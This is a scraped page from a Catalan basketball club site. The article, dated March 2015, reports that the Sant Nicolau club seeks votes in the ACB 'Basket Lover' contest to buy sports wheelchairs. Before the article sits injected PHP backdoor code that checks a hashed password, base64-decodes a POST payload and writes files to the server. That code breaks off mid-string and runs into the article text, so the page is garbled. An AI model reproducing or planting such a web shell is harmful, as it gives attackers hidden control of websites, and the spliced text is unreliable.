function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Sant Nicolau busca suport a una causa encomiable: trobar diners per comprar cadires de rodes - Tgn Bàsquet Club -

El Sant Nicolau busca suport a una causa encomiable: trobar diners per comprar cadires de rodes

By
Updated: març 29, 2015

En una societat tan materialista, mercantilitzada i, en certa manera, tan egoista, veure com algú proposa un projecte d’integració dels discapacitats mitjançant l’esport, és corprenedor. És fantàstic. Això és el que està fent un dels clubs que participen en el Torneig Internacional del TGN Bàsquet a Cambrils, el Sant Nicolau. Aquest club, que porta sis edicions en el campionat, està immers en un projecte encomiable i solidari: busca guanyar el concurs Basket Lover impulsat per la LligaEndesa (ACB) i que atorga un premi de 6.000 euros al millor projecte de tot el territori estatal.

El Sant Nicolau és un dels 8 finalistes. El guanyador serà triat per votació popular des d’avui dissabte i fins al pròxim 3 d’abril. “Nosaltres tenim un equip de bàsquet amb cadira de rodes al club. De fet, el nostre entrenador és l’antic seleccionador estatal. Ell va decidir deixar la selecció espanyola per venir a dirigir el nostre equip l’equip”, explica Albert Muñoz, coordinador de minibàsquet del Sant Nicolau. “Volem organitzar un campionat escolar de bàsquet amb cadira de rodes però per això ens fa falta precisament el més important, les cadires. Hi ha molts joves que van amb cadira de rodes i volen jugar a bàsquet amb nosaltres. La cadira per anar pel carrer, però, no serveix per jugar. Cal una cadira especial i val molts diners. Volem promocionar aquest esport però si ells no tenen cadires, no podran jugar. És per això que hem presentat el projecte a Basket Lover [el projecte s’anomena La silla deseada]”, diu.

El jugador de l’ACB triat per promocionar el projecte del Sant Nicolau és, ni més ni menys, que Justin Doellman, aler pivot del Barça i que el curs passat, tot militant al València, va ser triat MVP de la Lliga Endesa. “Hi ha un projecte de Melilla que ja porta 11.000 vots. Volem intentar guanyar i complir el nostre somni, per això necessitem el suport de tothom”, explica Muñoz.

Aquí pots veure la informació al web de l’ACB: ARTICLE DE LA NOTÍCIA DEL PROJECTE DEL SANT NICOLAU 

I aquí pots v0tar pel projecte del Sant Nicolau: PÀGINA ON POTS VOTAR PEL PROJECTE DE BÀSQUET EN CADIRA DE RODES “LA SILLA DESEADA”

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *